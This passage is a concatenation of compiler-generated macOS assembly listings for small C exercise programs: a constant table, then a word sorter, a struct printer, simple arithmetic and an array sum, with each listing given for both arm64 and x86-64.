.long 2596254646 ## 0x9abfb3b6
.long 62317068 ## 0x3b6e20c
.long 1957810842 ## 0x74b1d29a
.long 3939845945 ## 0xead54739
.long 2647816111 ## 0x9dd277af
.long 81470997 ## 0x4db2615
.long 1943803523 ## 0x73dc1683
.long 3814918930 ## 0xe3630b12
.long 2489596804 ## 0x94643b84
.long 225274430 ## 0xd6d6a3e
.long 2053790376 ## 0x7a6a5aa8
.long 3826175755 ## 0xe40ecf0b
.long 2466906013 ## 0x9309ff9d
.long 167816743 ## 0xa00ae27
.long 2097651377 ## 0x7d079eb1
.long 4027552580 ## 0xf00f9344
.long 2265490386 ## 0x8708a3d2
.long 503444072 ## 0x1e01f268
.long 1762050814 ## 0x6906c2fe
.long 4150417245 ## 0xf762575d
.long 2154129355 ## 0x806567cb
.long 426522225 ## 0x196c3671
.long 1852507879 ## 0x6e6b06e7
.long 4275313526 ## 0xfed41b76
.long 2312317920 ## 0x89d32be0
.long 282753626 ## 0x10da7a5a
.long 1742555852 ## 0x67dd4acc
.long 4189708143 ## 0xf9b9df6f
.long 2394877945 ## 0x8ebeeff9
.long 397917763 ## 0x17b7be43
.long 1622183637 ## 0x60b08ed5
.long 3604390888 ## 0xd6d6a3e8
.long 2714866558 ## 0xa1d1937e
.long 953729732 ## 0x38d8c2c4
.long 1340076626 ## 0x4fdff252
.long 3518719985 ## 0xd1bb67f1
.long 2797360999 ## 0xa6bc5767
.long 1068828381 ## 0x3fb506dd
.long 1219638859 ## 0x48b2364b
.long 3624741850 ## 0xd80d2bda
.long 2936675148 ## 0xaf0a1b4c
.long 906185462 ## 0x36034af6
.long 1090812512 ## 0x41047a60
.long 3747672003 ## 0xdf60efc3
.long 2825379669 ## 0xa867df55
.long 829329135 ## 0x316e8eef
.long 1181335161 ## 0x4669be79
.long 3412177804 ## 0xcb61b38c
.long 3160834842 ## 0xbc66831a
.long 628085408 ## 0x256fd2a0
.long 1382605366 ## 0x5268e236
.long 3423369109 ## 0xcc0c7795
.long 3138078467 ## 0xbb0b4703
.long 570562233 ## 0x220216b9
.long 1426400815 ## 0x5505262f
.long 3317316542 ## 0xc5ba3bbe
.long 2998733608 ## 0xb2bd0b28
.long 733239954 ## 0x2bb45a92
.long 1555261956 ## 0x5cb36a04
.long 3268935591 ## 0xc2d7ffa7
.long 3050360625 ## 0xb5d0cf31
.long 752459403 ## 0x2cd99e8b
.long 1541320221 ## 0x5bdeae1d
.long 2607071920 ## 0x9b64c2b0
.long 3965973030 ## 0xec63f226
.long 1969922972 ## 0x756aa39c
.long 40735498 ## 0x26d930a
.long 2617837225 ## 0x9c0906a9
.long 3943577151 ## 0xeb0e363f
.long 1913087877 ## 0x72076785
.long 83908371 ## 0x5005713
.long 2512341634 ## 0x95bf4a82
.long 3803740692 ## 0xe2b87a14
.long 2075208622 ## 0x7bb12bae
.long 213261112 ## 0xcb61b38
.long 2463272603 ## 0x92d28e9b
.long 3855990285 ## 0xe5d5be0d
.long 2094854071 ## 0x7cdcefb7
.long 198958881 ## 0xbdbdf21
.long 2262029012 ## 0x86d3d2d4
.long 4057260610 ## 0xf1d4e242
.long 1759359992 ## 0x68ddb3f8
.long 534414190 ## 0x1fda836e
.long 2176718541 ## 0x81be16cd
.long 4139329115 ## 0xf6b9265b
.long 1873836001 ## 0x6fb077e1
.long 414664567 ## 0x18b74777
.long 2282248934 ## 0x88085ae6
.long 4279200368 ## 0xff0f6a70
.long 1711684554 ## 0x66063bca
.long 285281116 ## 0x11010b5c
.long 2405801727 ## 0x8f659eff
.long 4167216745 ## 0xf862ae69
.long 1634467795 ## 0x616bffd3
.long 376229701 ## 0x166ccf45
.long 2685067896 ## 0xa00ae278
.long 3608007406 ## 0xd70dd2ee
.long 1308918612 ## 0x4e048354
.long 956543938 ## 0x3903b3c2
.long 2808555105 ## 0xa7672661
.long 3495958263 ## 0xd06016f7
.long 1231636301 ## 0x4969474d
.long 1047427035 ## 0x3e6e77db
.long 2932959818 ## 0xaed16a4a
.long 3654703836 ## 0xd9d65adc
.long 1088359270 ## 0x40df0b66
.long 936918000 ## 0x37d83bf0
.long 2847714899 ## 0xa9bcae53
.long 3736837829 ## 0xdebb9ec5
.long 1202900863 ## 0x47b2cf7f
.long 817233897 ## 0x30b5ffe9
.long 3183342108 ## 0xbdbdf21c
.long 3401237130 ## 0xcabac28a
.long 1404277552 ## 0x53b39330
.long 615818150 ## 0x24b4a3a6
.long 3134207493 ## 0xbad03605
.long 3453421203 ## 0xcdd70693
.long 1423857449 ## 0x54de5729
.long 601450431 ## 0x23d967bf
.long 3009837614 ## 0xb3667a2e
.long 3294710456 ## 0xc4614ab8
.long 1567103746 ## 0x5d681b02
.long 711928724 ## 0x2a6f2b94
.long 3020668471 ## 0xb40bbe37
.long 3272380065 ## 0xc30c8ea1
.long 1510334235 ## 0x5a05df1b
.long 755167117 ## 0x2d02ef8d
.subsections_via_symbols
| the_stack_data/45057.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
mov w9, #36848
movk w9, #1, lsl #16
adrp x16, ___chkstk_darwin@GOTPAGE
ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF]
blr x16
sub sp, sp, #24, lsl #12 ; =98304
sub sp, sp, #4080
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str wzr, [sp, #64]
add x0, sp, #172
mov x1, #36668
movk x1, #1, lsl #16
bl _bzero
str wzr, [sp, #60]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_2 Depth 2
str wzr, [sp, #52]
b LBB0_2
LBB0_2: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
bl _getchar
strb w0, [sp, #47]
ldrsb w8, [sp, #47]
subs w8, w8, #32
cset w8, eq
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_2 Depth=2
ldrsb w8, [sp, #47]
subs w8, w8, #10
cset w8, ne
tbnz w8, #0, LBB0_5
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
b LBB0_7
LBB0_5: ; in Loop: Header=BB0_2 Depth=2
ldrb w8, [sp, #47]
ldrsw x9, [sp, #60]
mov x10, #102
mul x10, x9, x10
add x9, sp, #172
add x9, x9, x10
ldrsw x10, [sp, #52]
add x9, x9, x10
strb w8, [x9]
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_2 Depth=2
ldr w8, [sp, #52]
add w8, w8, #1
str w8, [sp, #52]
b LBB0_2
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #47]
subs w8, w8, #10
cset w8, ne
tbnz w8, #0, LBB0_9
b LBB0_8
LBB0_8:
b LBB0_11
LBB0_9: ; in Loop: Header=BB0_1 Depth=1
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #60]
add w8, w8, #1
str w8, [sp, #60]
b LBB0_1
LBB0_11:
str wzr, [sp, #52]
b LBB0_12
LBB0_12: ; =>This Loop Header: Depth=1
; Child Loop BB0_14 Depth 2
ldr w8, [sp, #52]
ldr w9, [sp, #60]
add w9, w9, #1
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_21
b LBB0_13
LBB0_13: ; in Loop: Header=BB0_12 Depth=1
str wzr, [sp, #56]
b LBB0_14
LBB0_14: ; Parent Loop BB0_12 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #56]
ldr w9, [sp, #60]
add w9, w9, #1
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_19
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_14 Depth=2
ldrsw x8, [sp, #56]
mov x9, #102
mul x9, x8, x9
add x10, sp, #172
mov x8, x10
add x0, x8, x9
ldr w8, [sp, #56]
add w8, w8, #1
mov w9, #102
smaddl x1, w8, w9, x10
bl _strcmp
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB0_17
b LBB0_16
LBB0_16: ; in Loop: Header=BB0_14 Depth=2
ldrsw x8, [sp, #56]
mov x9, #102
str x9, [sp, #8] ; 8-byte Folded Spill
mul x9, x8, x9
add x8, sp, #172
str x8, [sp, #16] ; 8-byte Folded Spill
add x1, x8, x9
add x0, sp, #70
str x0, [sp, #24] ; 8-byte Folded Spill
mov x2, #102
bl ___strcpy_chk
ldr x9, [sp, #8] ; 8-byte Folded Reload
ldr x10, [sp, #16] ; 8-byte Folded Reload
ldrsw x8, [sp, #56]
mul x9, x8, x9
mov x8, x10
add x0, x8, x9
ldr w8, [sp, #56]
add w8, w8, #1
mov w9, #102
smaddl x1, w8, w9, x10
mov x2, #-1
str x2, [sp, #32] ; 8-byte Folded Spill
bl ___strcpy_chk
ldr x10, [sp, #16] ; 8-byte Folded Reload
ldr x1, [sp, #24] ; 8-byte Folded Reload
ldr x2, [sp, #32] ; 8-byte Folded Reload
ldr w8, [sp, #56]
add w8, w8, #1
mov w9, #102
smaddl x0, w8, w9, x10
bl ___strcpy_chk
b LBB0_17
LBB0_17: ; in Loop: Header=BB0_14 Depth=2
b LBB0_18
LBB0_18: ; in Loop: Header=BB0_14 Depth=2
ldr w8, [sp, #56]
add w8, w8, #1
str w8, [sp, #56]
b LBB0_14
LBB0_19: ; in Loop: Header=BB0_12 Depth=1
b LBB0_20
LBB0_20: ; in Loop: Header=BB0_12 Depth=1
ldr w8, [sp, #52]
add w8, w8, #1
str w8, [sp, #52]
b LBB0_12
LBB0_21:
ldr w8, [sp, #60]
add w8, w8, #1
str w8, [sp, #52]
b LBB0_22
LBB0_22: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #52]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB0_27
b LBB0_23
LBB0_23: ; in Loop: Header=BB0_22 Depth=1
ldrsw x8, [sp, #52]
mov x9, #102
mul x9, x8, x9
add x10, sp, #172
mov x8, x10
add x0, x8, x9
ldr w8, [sp, #52]
add w8, w8, #1
mov w9, #102
smaddl x1, w8, w9, x10
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_25
b LBB0_24
LBB0_24: ; in Loop: Header=BB0_22 Depth=1
b LBB0_26
LBB0_25: ; in Loop: Header=BB0_22 Depth=1
ldrsw x8, [sp, #52]
mov x9, #102
mul x9, x8, x9
add x8, sp, #172
add x8, x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
b LBB0_26
LBB0_26: ; in Loop: Header=BB0_22 Depth=1
ldr w8, [sp, #52]
subs w8, w8, #1
str w8, [sp, #52]
b LBB0_22
LBB0_27:
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_29
b LBB0_28
LBB0_28:
bl ___stack_chk_fail
LBB0_29:
mov w0, #0
add sp, sp, #24, lsl #12 ; =98304
add sp, sp, #4080
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%s\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl $102368, %eax ## imm = 0x18FE0
callq ____chkstk_darwin
subq %rax, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -102340(%rbp)
leaq -102224(%rbp), %rdi
xorl %esi, %esi
movl $102204, %edx ## imm = 0x18F3C
callq _memset
movl $0, -102344(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_2 Depth 2
movl $0, -102352(%rbp)
LBB0_2: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
callq _getchar
## kill: def $al killed $al killed $eax
movb %al, -102357(%rbp)
movsbl -102357(%rbp), %eax
cmpl $32, %eax
je LBB0_4
## %bb.3: ## in Loop: Header=BB0_2 Depth=2
movsbl -102357(%rbp), %eax
cmpl $10, %eax
jne LBB0_5
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_7
LBB0_5: ## in Loop: Header=BB0_2 Depth=2
movb -102357(%rbp), %dl
movslq -102344(%rbp), %rcx
leaq -102224(%rbp), %rax
imulq $102, %rcx, %rcx
addq %rcx, %rax
movslq -102352(%rbp), %rcx
movb %dl, (%rax,%rcx)
## %bb.6: ## in Loop: Header=BB0_2 Depth=2
movl -102352(%rbp), %eax
addl $1, %eax
movl %eax, -102352(%rbp)
jmp LBB0_2
LBB0_7: ## in Loop: Header=BB0_1 Depth=1
movsbl -102357(%rbp), %eax
cmpl $10, %eax
jne LBB0_9
## %bb.8:
jmp LBB0_11
LBB0_9: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_10
LBB0_10: ## in Loop: Header=BB0_1 Depth=1
movl -102344(%rbp), %eax
addl $1, %eax
movl %eax, -102344(%rbp)
jmp LBB0_1
LBB0_11:
movl $0, -102352(%rbp)
LBB0_12: ## =>This Loop Header: Depth=1
## Child Loop BB0_14 Depth 2
movl -102352(%rbp), %eax
movl -102344(%rbp), %ecx
addl $1, %ecx
cmpl %ecx, %eax
jge LBB0_21
## %bb.13: ## in Loop: Header=BB0_12 Depth=1
movl $0, -102348(%rbp)
LBB0_14: ## Parent Loop BB0_12 Depth=1
## => This Inner Loop Header: Depth=2
movl -102348(%rbp), %eax
movl -102344(%rbp), %ecx
addl $1, %ecx
cmpl %ecx, %eax
jge LBB0_19
## %bb.15: ## in Loop: Header=BB0_14 Depth=2
movslq -102348(%rbp), %rax
leaq -102224(%rbp), %rdi
imulq $102, %rax, %rax
addq %rax, %rdi
movl -102348(%rbp), %eax
addl $1, %eax
cltq
leaq -102224(%rbp), %rsi
imulq $102, %rax, %rax
addq %rax, %rsi
callq _strcmp
cmpl $0, %eax
jge LBB0_17
## %bb.16: ## in Loop: Header=BB0_14 Depth=2
leaq -102336(%rbp), %rdi
movslq -102348(%rbp), %rax
leaq -102224(%rbp), %rsi
imulq $102, %rax, %rax
addq %rax, %rsi
movl $102, %edx
callq ___strcpy_chk
movslq -102348(%rbp), %rax
leaq -102224(%rbp), %rdi
imulq $102, %rax, %rax
addq %rax, %rdi
movl -102348(%rbp), %eax
addl $1, %eax
cltq
leaq -102224(%rbp), %rsi
imulq $102, %rax, %rax
addq %rax, %rsi
movq $-1, %rdx
callq ___strcpy_chk
movl -102348(%rbp), %eax
addl $1, %eax
cltq
leaq -102224(%rbp), %rdi
imulq $102, %rax, %rax
addq %rax, %rdi
leaq -102336(%rbp), %rsi
movq $-1, %rdx
callq ___strcpy_chk
LBB0_17: ## in Loop: Header=BB0_14 Depth=2
jmp LBB0_18
LBB0_18: ## in Loop: Header=BB0_14 Depth=2
movl -102348(%rbp), %eax
addl $1, %eax
movl %eax, -102348(%rbp)
jmp LBB0_14
LBB0_19: ## in Loop: Header=BB0_12 Depth=1
jmp LBB0_20
LBB0_20: ## in Loop: Header=BB0_12 Depth=1
movl -102352(%rbp), %eax
addl $1, %eax
movl %eax, -102352(%rbp)
jmp LBB0_12
LBB0_21:
movl -102344(%rbp), %eax
addl $1, %eax
movl %eax, -102352(%rbp)
LBB0_22: ## =>This Inner Loop Header: Depth=1
cmpl $0, -102352(%rbp)
jl LBB0_27
## %bb.23: ## in Loop: Header=BB0_22 Depth=1
movslq -102352(%rbp), %rax
leaq -102224(%rbp), %rdi
imulq $102, %rax, %rax
addq %rax, %rdi
movl -102352(%rbp), %eax
addl $1, %eax
cltq
leaq -102224(%rbp), %rsi
imulq $102, %rax, %rax
addq %rax, %rsi
callq _strcmp
cmpl $0, %eax
jne LBB0_25
## %bb.24: ## in Loop: Header=BB0_22 Depth=1
jmp LBB0_26
LBB0_25: ## in Loop: Header=BB0_22 Depth=1
movslq -102352(%rbp), %rax
leaq -102224(%rbp), %rsi
imulq $102, %rax, %rax
addq %rax, %rsi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
LBB0_26: ## in Loop: Header=BB0_22 Depth=1
movl -102352(%rbp), %eax
addl $-1, %eax
movl %eax, -102352(%rbp)
jmp LBB0_22
LBB0_27:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_29
## %bb.28:
xorl %eax, %eax
addq $102368, %rsp ## imm = 0x18FE0
popq %rbp
retq
LBB0_29:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%s\n"
.subsections_via_symbols
| the_stack_data/442666.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #128
.cfi_def_cfa_offset 128
stp x29, x30, [sp, #112] ; 16-byte Folded Spill
add x29, sp, #112
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, l___const.main.hyeonkim@PAGE
add x8, x8, l___const.main.hyeonkim@PAGEOFF
ldr q0, [x8]
sub x9, x29, #32
str x9, [sp, #8] ; 8-byte Folded Spill
stur q0, [x29, #-32]
ldr x8, [x8, #16]
stur x8, [x29, #-16]
ldur x8, [x29, #-32]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
str x0, [sp, #16] ; 8-byte Folded Spill
bl _printf
ldur d0, [x29, #-24]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
str x0, [sp, #24] ; 8-byte Folded Spill
bl _printf
ldur x8, [x29, #-16]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
str x0, [sp, #32] ; 8-byte Folded Spill
bl _printf
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
str x0, [sp, #40] ; 8-byte Folded Spill
bl _printf
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr x0, [sp, #16] ; 8-byte Folded Reload
mov x9, x8
stur x9, [x29, #-40]
ldur x9, [x29, #-40]
stur x9, [x29, #-48]
ldur x9, [x29, #-40]
str x9, [sp, #56]
str x8, [sp, #48]
ldr x8, [sp, #48]
ldr x8, [x8]
mov x9, sp
str x8, [x9]
bl _printf
ldr x0, [sp, #24] ; 8-byte Folded Reload
ldr x8, [sp, #48]
ldr d0, [x8, #8]
mov x8, sp
str d0, [x8]
bl _printf
ldr x0, [sp, #32] ; 8-byte Folded Reload
ldr x8, [sp, #48]
ldr x8, [x8, #16]
mov x9, sp
str x8, [x9]
bl _printf
ldr x0, [sp, #40] ; 8-byte Folded Reload
bl _printf
ldr x0, [sp, #16] ; 8-byte Folded Reload
ldr x8, [sp, #48]
ldr x8, [x8]
mov x9, sp
str x8, [x9]
bl _printf
ldr x0, [sp, #24] ; 8-byte Folded Reload
ldr x8, [sp, #48]
ldr d0, [x8, #8]
mov x8, sp
str d0, [x8]
bl _printf
ldr x0, [sp, #32] ; 8-byte Folded Reload
ldr x8, [sp, #48]
ldr x8, [x8, #16]
mov x9, sp
str x8, [x9]
bl _printf
ldr x0, [sp, #40] ; 8-byte Folded Reload
bl _printf
mov w0, #0
ldp x29, x30, [sp, #112] ; 16-byte Folded Reload
add sp, sp, #128
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "\352\271\200\354\247\200\355\230\204"
.section __DATA,__const
.p2align 3 ; @__const.main.hyeonkim
l___const.main.hyeonkim:
.quad l_.str
.quad 0x4011333333333333 ; double 4.2999999999999998
.quad 201311392 ; 0xbffc4a0
.section __TEXT,__cstring,cstring_literals
l_.str.1: ; @.str.1
.asciz "name: %s\n"
l_.str.2: ; @.str.2
.asciz "gpa: %lf\n"
l_.str.3: ; @.str.3
.asciz "id: %ld\n"
l_.str.4: ; @.str.4
.asciz "\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq l___const.main.hyeonkim(%rip), %rax
movq %rax, -24(%rbp)
movq l___const.main.hyeonkim+8(%rip), %rax
movq %rax, -16(%rbp)
movq l___const.main.hyeonkim+16(%rip), %rax
movq %rax, -8(%rbp)
movq -24(%rbp), %rsi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.2(%rip), %rdi
movb $1, %al
callq _printf
movq -8(%rbp), %rsi
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
leaq -24(%rbp), %rax
movq %rax, -32(%rbp)
movq -32(%rbp), %rax
movq %rax, -40(%rbp)
movq -32(%rbp), %rax
movq %rax, -48(%rbp)
leaq -24(%rbp), %rax
movq %rax, -56(%rbp)
movq -56(%rbp), %rax
movq (%rax), %rsi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movq -56(%rbp), %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.2(%rip), %rdi
movb $1, %al
callq _printf
movq -56(%rbp), %rax
movq 16(%rax), %rsi
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
movq -56(%rbp), %rax
movq (%rax), %rsi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movq -56(%rbp), %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.2(%rip), %rdi
movb $1, %al
callq _printf
movq -56(%rbp), %rax
movq 16(%rax), %rsi
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "\352\271\200\354\247\200\355\230\204"
.section __DATA,__const
.p2align 3 ## @__const.main.hyeonkim
l___const.main.hyeonkim:
.quad L_.str
.quad 0x4011333333333333 ## double 4.2999999999999998
.quad 201311392 ## 0xbffc4a0
.section __TEXT,__cstring,cstring_literals
L_.str.1: ## @.str.1
.asciz "name: %s\n"
L_.str.2: ## @.str.2
.asciz "gpa: %lf\n"
L_.str.3: ## @.str.3
.asciz "id: %ld\n"
L_.str.4: ## @.str.4
.asciz "\n"
.subsections_via_symbols
| the_stack_data/211082013.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #5
stur w8, [x29, #-4]
mov w8, #10
stur w8, [x29, #-8]
mov w8, #15
stur w8, [x29, #-12]
ldur w8, [x29, #-4]
ldur w9, [x29, #-4]
mul w10, w8, w9
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
ldur w8, [x29, #-4]
ldur w9, [x29, #-8]
add w10, w8, w9
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
ldur w8, [x29, #-4]
ldur w9, [x29, #-8]
ldur w10, [x29, #-12]
mul w9, w9, w10
add w10, w8, w9
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
ldur w8, [x29, #-4]
ldur w9, [x29, #-4]
add w8, w8, w9
ldur w9, [x29, #-8]
ldur w10, [x29, #-8]
add w9, w9, w10
mul w10, w8, w9
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "SQUARE: %d\n"
l_.str.1: ; @.str.1
.asciz "SUM: %d\n"
l_.str.2: ; @.str.2
.asciz "SUMUL: %d\n"
l_.str.3: ; @.str.3
.asciz "MULSUM: %d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $5, -4(%rbp)
movl $10, -8(%rbp)
movl $15, -12(%rbp)
movl -4(%rbp), %esi
imull -4(%rbp), %esi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
movl -4(%rbp), %esi
addl -8(%rbp), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movl -4(%rbp), %esi
movl -8(%rbp), %eax
imull -12(%rbp), %eax
addl %eax, %esi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
movl -4(%rbp), %esi
addl -4(%rbp), %esi
movl -8(%rbp), %eax
addl -8(%rbp), %eax
imull %eax, %esi
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "SQUARE: %d\n"
L_.str.1: ## @.str.1
.asciz "SUM: %d\n"
L_.str.2: ## @.str.2
.asciz "SUMUL: %d\n"
L_.str.3: ## @.str.3
.asciz "MULSUM: %d\n"
.subsections_via_symbols
| the_stack_data/66876.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #2944
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str wzr, [sp, #52]
add x0, sp, #56
mov x1, #2880
bl _bzero
str wzr, [sp, #48]
str wzr, [sp, #44]
str wzr, [sp, #40]
mov w8, #720
str w8, [sp, #36]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_3 Depth 2
ldr w8, [sp, #48]
subs w8, w8, #30
cset w8, ge
tbnz w8, #0, LBB0_8
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
b LBB0_3
LBB0_3: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #44]
subs w8, w8, #24
cset w8, ge
tbnz w8, #0, LBB0_6
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=2
ldrsw x8, [sp, #48]
mov x9, #96
mul x9, x8, x9
add x8, sp, #56
add x8, x8, x9
ldrsw x9, [sp, #44]
ldr w9, [x8, x9, lsl #2]
ldr w8, [sp, #40]
add w8, w8, w9
str w8, [sp, #40]
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_3 Depth=2
ldr w8, [sp, #44]
add w8, w8, #1
str w8, [sp, #44]
b LBB0_3
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #48]
add w8, w8, #1
str w8, [sp, #48]
b LBB0_1
LBB0_8:
ldr w8, [sp, #40]
; implicit-def: $x11
mov x11, x8
ldr w9, [sp, #36]
; implicit-def: $x8
mov x8, x9
ldr w9, [sp, #40]
ldr w10, [sp, #36]
sdiv w10, w9, w10
mov x9, sp
str x11, [x9]
str x8, [x9, #8]
; implicit-def: $x8
